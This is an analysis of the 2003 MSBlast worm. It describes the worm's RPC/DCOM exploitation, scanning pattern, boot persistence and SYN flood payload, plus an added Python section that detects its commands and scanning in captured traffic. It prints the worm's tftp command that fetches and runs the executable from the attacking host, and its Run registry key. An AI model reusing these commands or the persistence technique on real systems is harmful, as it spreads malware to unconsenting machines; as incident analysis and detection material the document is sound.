MSBlast Worm Analysis

On the afternoon of August 11, 2003, SecureWorks' analysts noted a sharp increase in the amount of scanning for the recent RPC/DCOM exploit. At the same time, honeypots monitored by SecureWorks' research team captured a worm in the wild, spreading prolifically.

The worm takes advantage of the vulnerability described in CERT Advisories VU#568148, CA-2003-16H, and CA-2003-19. The exploit code is derived from the HD Moore dcom.c exploit and uses the same command shell port. Upon successfully exploiting a host, the following commands are run:

tftp -i x.x.x.x GET msblast.exe
start msblast.exe
msblast.exe

The worm has its own tftp server built in, so x.x.x.x will be the IP address of the attacking host. The worm has a bug in the code that determines its own IP address; under certain conditions it will erroneously send commands to tftp its executable from the IP address "0.0.0.0". Under these conditions, the host will continue to scan, but will not be able to propagate.

The msblast.exe executable creates the following registry key to run at boot:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\windows auto update = 'msblast.exe'

The worm begins by scanning the local class B subnet. It also generates a random starting address and scans sequentially upward from that point, incrementing through the host, class C, class B and class A octets in turn. It can scan hosts at a rate of 20 per second; upon finding a vulnerable host, however, it may take up to 15 seconds to infect it.
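As an added illustration (not part of the SecureWorks writeup), the following Python sketches two defender-side checks built from the behaviour described above: classifying a captured command-shell transcript, including the 0.0.0.0 case in which the victim runs the commands but cannot fetch the executable, and flagging a source that sweeps consecutive addresses at the 20-hosts-per-second rate. The transcripts and flow records are constructed sample data, and the rate and window thresholds are assumptions.

```python
import re
from collections import defaultdict
from ipaddress import IPv4Address

# Command sequence the worm issues through the exploited command shell (from the writeup).
TFTP_RE = re.compile(r"^\s*tftp\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})\s+GET\s+msblast\.exe\s*$", re.I)
START_RE = re.compile(r"^\s*(start\s+)?msblast\.exe\s*$", re.I)


def classify_shell_session(lines):
    """Classify a captured command-shell transcript as (verdict, tftp_source).

    'infection': the tftp fetch named a real attacking host.
    'dud': the worm's own-IP bug sent 0.0.0.0, so the commands ran but the
           executable could not be downloaded (the host keeps scanning only
           if it was already infected).
    'none': no complete fetch-and-launch sequence was seen.
    """
    source, launched = None, False
    for line in lines:
        m = TFTP_RE.match(line)
        if m:
            source = m.group(1)
        elif source and START_RE.match(line):
            launched = True
    if source is None or not launched:
        return ("none", source)
    return ("dud" if source == "0.0.0.0" else "infection", source)


def find_sequential_scanners(flows, min_hosts=20, max_span=1.0):
    """flows: iterable of (timestamp, src, dst). Flags sources that hit at least
    min_hosts consecutive ascending destination addresses within max_span seconds
    (thresholds assumed from the 20 hosts/second figure). Returns {src: first_dst}."""
    by_src = defaultdict(list)
    for ts, src, dst in flows:
        by_src[src].append((ts, int(IPv4Address(dst))))
    flagged = {}
    for src, hits in by_src.items():
        hits.sort()
        start = 0
        for i in range(1, len(hits)):
            if hits[i][1] != hits[i - 1][1] + 1:
                start = i  # run of consecutive addresses broken; restart here
                continue
            first = i - min_hosts + 1  # oldest hit in the last min_hosts of this run
            if i - start + 1 >= min_hosts and hits[i][0] - hits[first][0] <= max_span:
                flagged[src] = str(IPv4Address(hits[first][1]))
                break
    return flagged


# Constructed sample inputs (not real captures).
INFECTION_SESSION = ["tftp -i 10.0.0.5 GET msblast.exe", "start msblast.exe", "msblast.exe"]
DUD_SESSION = ["tftp -i 0.0.0.0 GET msblast.exe", "start msblast.exe", "msblast.exe"]
SCAN_FLOWS = [(1000.0 + 0.05 * i, "10.0.0.5", f"192.168.1.{10 + i}") for i in range(26)]
SCAN_FLOWS += [(1000.3, "10.0.0.9", "192.168.1.50"), (1000.9, "10.0.0.9", "192.168.7.2")]
```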

The name "MSBlast" is well suited; the worm checks whether the date is on or after August 16 and, if so, begins to SYN flood windowsupdate.com using spoofed source IP addresses.

Removal of the worm is trivial; use the task manager to kill the msblast.exe process, then remove the associated registry key.
